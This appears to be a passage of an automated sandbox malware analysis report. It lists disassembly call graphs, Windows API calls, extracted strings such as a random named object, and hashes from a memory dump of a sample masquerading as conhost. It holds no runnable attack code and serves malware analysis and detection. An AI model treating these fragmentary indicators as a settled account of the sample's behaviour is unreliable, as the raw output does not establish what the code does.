Function_0000000140005951 47 Function_000000014000155D 47->72 48->72 49 Function_0000000140002460 51->40 51->51 51->57 65 Function_0000000140001880 51->65 66 Function_0000000140001F90 51->66 51->87 52 Function_0000000140001760 100 Function_00000001400020E0 52->100 53 Function_0000000140001E65 53->57 54->72 55->72 56 Function_000000014000216F 59 Function_0000000140001A70 59->35 59->76 60 Function_0000000140003070 61 Function_0000000140005771 62 Function_0000000140005871 63 Function_0000000140005971 64->72 65->23 65->35 65->50 65->76 68 Function_0000000140002590 69 Function_0000000140003090 70 Function_0000000140002691 71 Function_0000000140005791 72->4 72->34 73 Function_0000000140002194 73->57 74 Function_000000014000219E 75 Function_0000000140001FA0 76->35 80 Function_00000001400023B0 76->80 92 Function_00000001400024D0 76->92 77 Function_00000001400058A1 78->72 79->72 82 Function_00000001400022B0 83 Function_00000001400026B0 84 Function_00000001400030B1 85 Function_00000001400059B1 86 Function_0000000140001AB3 86->35 86->76 89 Function_00000001400057C1 90 Function_0000000140001AC3 90->35 90->76 91 Function_00000001400014C7 91->72 93 Function_00000001400017D0 94 Function_0000000140001FD0 95 Function_00000001400026D0 96 Function_0000000140001AD4 96->35 96->76 97->72 98 Function_00000001400022E0 99->3 99->7 99->15 99->21 99->29 99->47 99->48 99->50 99->58 99->79 99->91 101 Function_00000001400017E0 101->100

                                                      Control-flow Graph

                                                      APIs
                                                      • NtDeleteWnfStateName.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3409823550.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000017.00000002.3409748673.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3409844512.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3409864252.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3409882051.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID: DeleteNameState
                                                      • String ID:
                                                      • API String ID: 3734940635-0
                                                      • Opcode ID: 3210746a9923182c7327b5e3e833e7d58ed368a322bb56d3eeddf1d7b1502087
                                                      • Instruction ID: ea77cefef780fe59d28cb35e84be700af1ff747ec22ba00de631e0254e728e30
                                                      • Opcode Fuzzy Hash: 3210746a9923182c7327b5e3e833e7d58ed368a322bb56d3eeddf1d7b1502087
                                                      • Instruction Fuzzy Hash: C7F0A4B2608B408AEA11DB52F85179A77A1F38D7C0F005919BBC947735DB3CC150CB40

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 308 1400026e0-14000273b call 140002660 312 140002741-14000274b 308->312 313 14000280e-14000285e call 14000155d 308->313 315 140002774-14000277a 312->315 318 140002953-14000297b call 1400014c7 313->318 319 140002864-140002873 313->319 315->313 317 140002780-140002787 315->317 320 140002789-140002792 317->320 321 140002750-140002752 317->321 335 140002986-1400029c8 call 140001503 call 140005a30 318->335 336 14000297d 318->336 322 140002eb7-140002ef4 call 140001370 319->322 323 140002879-140002888 319->323 326 140002794-1400027ab 320->326 327 1400027f8-1400027fb 320->327 324 14000275a-14000276e 321->324 332 1400028e4-14000294e wcsncmp call 1400014e5 323->332 333 14000288a-1400028dd 323->333 324->313 324->315 330 1400027f5 326->330 331 1400027ad-1400027c2 326->331 327->324 330->327 337 1400027d0-1400027d7 331->337 332->318 333->332 346 140002e49-140002e84 call 140001370 335->346 347 1400029ce-1400029d5 335->347 336->335 339 1400027d9-1400027f3 337->339 340 140002800-140002809 337->340 339->330 339->337 340->324 350 1400029d7-140002a0c 346->350 354 140002e8a 346->354 349 140002a13-140002a43 wcscpy wcscat wcslen 347->349 347->350 352 140002a45-140002a76 wcslen 349->352 353 140002a78-140002aa5 349->353 350->349 355 140002aa8-140002abf wcslen 352->355 353->355 354->349 356 140002ac5-140002ad8 355->356 357 140002e8f-140002eab call 140001370 355->357 358 140002af5-140002dfb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 356->358 359 140002ada-140002aee 356->359 357->322 378 140002dfd-140002e1b call 140001512 358->378 379 140002e20-140002e48 call 14000145e 358->379 359->358 378->379
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3409823550.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000017.00000002.3409748673.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3409844512.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3409864252.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3409882051.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID: wcslen$wcscatwcscpywcsncmp
                                                      • String ID: 0$X$\BaseNamedObjects\sqdbwqfaounzqqdtprwhhpct$`
                                                      • API String ID: 597572034-1571959862
                                                      • Opcode ID: 185c9c1f25848b36373bdd529c703a72ea962c16b9617e59a2fa1317b054f0dc
                                                      • Instruction ID: b74dd05d4a6040c45e884f40807bbd4c45a660658f3a768bf3ecd589c10fb269
                                                      • Opcode Fuzzy Hash: 185c9c1f25848b36373bdd529c703a72ea962c16b9617e59a2fa1317b054f0dc
                                                      • Instruction Fuzzy Hash: F31248B2608BC481E762CB16F8443EAB7A4F789794F414215EBA857BF5EF78C189C700

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3409823550.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000017.00000002.3409748673.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3409844512.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3409864252.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3409882051.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                      • String ID:
                                                      • API String ID: 2643109117-0
                                                      • Opcode ID: 0826702d6560d8963aa6be3a9a2bca2e7c57e1532fe8f27e33951a1a52f0c01f
                                                      • Instruction ID: de31f8ed3ddf153564bdd4405856fabd387a055f97d5097261988c330ce0911c
                                                      • Opcode Fuzzy Hash: 0826702d6560d8963aa6be3a9a2bca2e7c57e1532fe8f27e33951a1a52f0c01f
                                                      • Instruction Fuzzy Hash: 475113B1A11A4085FB16EF27F9947EA27A5BB8D7D0F449121FB4E873B2DE38C4958300

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 424 140001ba0-140001bc0 425 140001bc2-140001bd7 424->425 426 140001c09 424->426 427 140001be9-140001bf1 425->427 428 140001c0c-140001c17 call 1400023b0 426->428 429 140001bf3-140001c02 427->429 430 140001be0-140001be7 427->430 435 140001cf4-140001cfe call 140001d40 428->435 436 140001c1d-140001c6c call 1400024d0 VirtualQuery 428->436 429->430 432 140001c04 429->432 430->427 430->428 434 140001cd7-140001cf3 memcpy 432->434 440 140001d03-140001d1e call 140001d40 435->440 436->440 441 140001c72-140001c79 436->441 443 140001d23-140001d38 GetLastError call 140001d40 440->443 444 140001c7b-140001c7e 441->444 445 140001c8e-140001c97 441->445 447 140001cd1 444->447 448 140001c80-140001c83 444->448 449 140001ca4-140001ccf VirtualProtect 445->449 450 140001c99-140001c9c 445->450 447->434 448->447 452 140001c85-140001c8a 448->452 449->443 449->447 450->447 453 140001c9e 450->453 452->447 454 140001c8c 452->454 453->449 454->453
                                                      APIs
                                                      • VirtualQuery.KERNEL32(?,?,?,?,0000000140007C04,0000000140007C04,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                      • VirtualProtect.KERNEL32(?,?,?,?,0000000140007C04,0000000140007C04,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                      • memcpy.MSVCRT ref: 0000000140001CE0
                                                      • GetLastError.KERNEL32(?,?,?,?,0000000140007C04,0000000140007C04,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3409823550.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000017.00000002.3409748673.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3409844512.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3409864252.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3409882051.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                      • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                      • API String ID: 2595394609-2123141913
                                                      • Opcode ID: cdbb9d907875859e3f80f575495464bdaee28c88710b0bedc9e094766cfb12e3
                                                      • Instruction ID: 16efa6a6843d59a014476df5568b7df2ebffa848eb0c274e9a4a04f444c9e124
                                                      • Opcode Fuzzy Hash: cdbb9d907875859e3f80f575495464bdaee28c88710b0bedc9e094766cfb12e3
                                                      • Instruction Fuzzy Hash: 8B4153F1601A4486FA22DF47F884BE927A0E78DBC4F544122EF0E877B1DA38C586C300

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 455 140002104-14000210b 456 140002111-140002128 EnterCriticalSection 455->456 457 140002218-140002221 455->457 458 14000220b-140002212 LeaveCriticalSection 456->458 459 14000212e-14000213c 456->459 460 140002272-140002280 457->460 461 140002223-14000222d 457->461 458->457 462 14000214d-140002159 TlsGetValue GetLastError 459->462 463 140002241-140002263 DeleteCriticalSection 461->463 464 14000222f 461->464 466 14000215b-14000215e 462->466 467 140002140-140002147 462->467 463->460 465 140002230-14000223f 464->465 465->463 466->467 468 140002160-14000216d 466->468 467->458 467->462 468->467
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3409823550.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000017.00000002.3409748673.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3409844512.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3409864252.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3409882051.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                                      • String ID:
                                                      • API String ID: 926137887-0
                                                      • Opcode ID: 3cf6fdcf877a2c463b1673d0d7d37342476749bfb961c2d74f3cd03d9e62891d
                                                      • Instruction ID: 0e199cc0cf033006c356eea73698cd941ec16a166456d7ae25831b0cf903e09c
                                                      • Opcode Fuzzy Hash: 3cf6fdcf877a2c463b1673d0d7d37342476749bfb961c2d74f3cd03d9e62891d
                                                      • Instruction Fuzzy Hash: D321E0B1715A02D2FA5BEB53F9483E923A0B76CBD0F444421FB1A576B4DF7A8986C300

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 471 140001e10-140001e2d 472 140001e3e-140001e48 471->472 473 140001e2f-140001e38 471->473 475 140001ea3-140001ea8 472->475 476 140001e4a-140001e53 472->476 473->472 474 140001f60-140001f69 473->474 475->474 479 140001eae-140001eb3 475->479 477 140001e55-140001e60 476->477 478 140001ecc-140001ed1 476->478 477->475 480 140001f23-140001f2d 478->480 481 140001ed3-140001ee2 signal 478->481 482 140001eb5-140001eba 479->482 483 140001efb-140001f0a call 140005fe0 479->483 486 140001f43-140001f45 480->486 487 140001f2f-140001f3f 480->487 481->480 484 140001ee4-140001ee8 481->484 482->474 488 140001ec0 482->488 483->480 492 140001f0c-140001f10 483->492 489 140001eea-140001ef9 signal 484->489 490 140001f4e-140001f53 484->490 486->474 487->486 488->480 489->474 493 140001f5a 490->493 494 140001f12-140001f21 signal 492->494 495 140001f55 492->495 493->474 494->474 495->493
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3409823550.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000017.00000002.3409748673.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3409844512.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3409864252.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3409882051.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CCG
                                                      • API String ID: 0-1584390748
                                                      • Opcode ID: 5280163379377ca6e44e0c5d2c698eb6079499830711fbae46cc424a6ca625e0
                                                      • Instruction ID: a59ecfcda80627e887a2afd302da497d78ca087d7541c475695dc2e3193e6173
                                                      • Opcode Fuzzy Hash: 5280163379377ca6e44e0c5d2c698eb6079499830711fbae46cc424a6ca625e0
                                                      • Instruction Fuzzy Hash: 052159B1A0110642FA77DA1BB5943FA1182ABCD7E4F258635FF19473F9DE7C88828241

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 496 140001880-14000189c 497 1400018a2-1400018f9 call 140002420 call 140002660 496->497 498 140001a0f-140001a1f 496->498 497->498 503 1400018ff-140001910 497->503 504 140001912-14000191c 503->504 505 14000193e-140001941 503->505 507 14000194d-140001954 504->507 508 14000191e-140001929 504->508 506 140001943-140001947 505->506 505->507 506->507 510 140001a20-140001a26 506->510 511 140001956-140001961 507->511 512 14000199e-1400019a6 507->512 508->507 509 14000192b-14000193a 508->509 509->505 515 140001b87-140001b98 call 140001d40 510->515 516 140001a2c-140001a37 510->516 513 140001970-14000199c call 140001ba0 511->513 512->498 514 1400019a8-1400019c1 512->514 513->512 520 1400019df-1400019e7 514->520 516->512 517 140001a3d-140001a5f 516->517 521 140001a7d-140001a97 517->521 524 1400019e9-140001a0d VirtualProtect 520->524 525 1400019d0-1400019dd 520->525 526 140001b74-140001b82 call 140001d40 521->526 527 140001a9d-140001afa 521->527 524->525 525->498 525->520 526->515 533 140001b22-140001b26 527->533 534 140001afc-140001b0e 527->534 537 140001b2c-140001b30 533->537 538 140001a70-140001a77 533->538 535 140001b5c-140001b6c 534->535 536 140001b10-140001b20 534->536 535->526 539 140001b6f call 140001d40 535->539 536->533 536->535 537->538 540 140001b36-140001b57 call 140001ba0 537->540 538->512 538->521 539->526 540->535
                                                      APIs
                                                      • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3409823550.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000017.00000002.3409748673.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3409844512.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3409864252.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3409882051.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                      • API String ID: 544645111-395989641
                                                      • Opcode ID: 3eb095557935172752f0c42cb9a03414d6f1cc8c641419fc4b235c5b65ea0db9
                                                      • Instruction ID: 880ce9b900098d8e88b33aba92109972d092741ba7b51464eee9d571f7133d00
                                                      • Opcode Fuzzy Hash: 3eb095557935172752f0c42cb9a03414d6f1cc8c641419fc4b235c5b65ea0db9
                                                      • Instruction Fuzzy Hash: E45114B6B11544DAEB12CF67F840BE827A1A759BE8F548212FB1D077B4DB38C986C700

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 544 140001800-140001810 545 140001812-140001822 544->545 546 140001824 544->546 547 14000182b-140001867 call 140002290 fprintf 545->547 546->547
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3409823550.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000017.00000002.3409748673.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3409844512.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3409864252.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3409882051.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID: fprintf
                                                      • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                      • API String ID: 383729395-3474627141
                                                      • Opcode ID: b5717ce3617b469f524d5a4a977c465a2e3941e764333e1ecdac5e330ef02b4f
                                                      • Instruction ID: 22fde9f0a61d81c45d0352baa9b4897200fbcb7987813caf25585494093de0dd
                                                      • Opcode Fuzzy Hash: b5717ce3617b469f524d5a4a977c465a2e3941e764333e1ecdac5e330ef02b4f
                                                      • Instruction Fuzzy Hash: 4BF09671A14A4482E612EF6AB9417ED6360E75D7C1F50D211FF4D576A5DF3CD182C310

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 550 14000219e-1400021a5 551 140002272-140002280 550->551 552 1400021ab-1400021c2 EnterCriticalSection 550->552 553 140002265-14000226c LeaveCriticalSection 552->553 554 1400021c8-1400021d6 552->554 553->551 555 1400021e9-1400021f5 TlsGetValue GetLastError 554->555 556 1400021f7-1400021fa 555->556 557 1400021e0-1400021e7 555->557 556->557 558 1400021fc-140002209 556->558 557->553 557->555 558->557
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3409823550.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000017.00000002.3409748673.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3409844512.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3409864252.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3409882051.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                      • String ID:
                                                      • API String ID: 682475483-0
                                                      • Opcode ID: cfe5d0de1f15cf2fea71291f3d789f0cc0b44e62d3dc103620a81fc554713c6a
                                                      • Instruction ID: 8a64a9037fcb0f8d448323bea24b37e1dc06a06277b74631a343a5268b32208f
                                                      • Opcode Fuzzy Hash: cfe5d0de1f15cf2fea71291f3d789f0cc0b44e62d3dc103620a81fc554713c6a
                                                      • Instruction Fuzzy Hash: 1901B2B6705A0192FA5BDB53FE083E86360B76CBD1F854021EF0953AB4DF79C996C200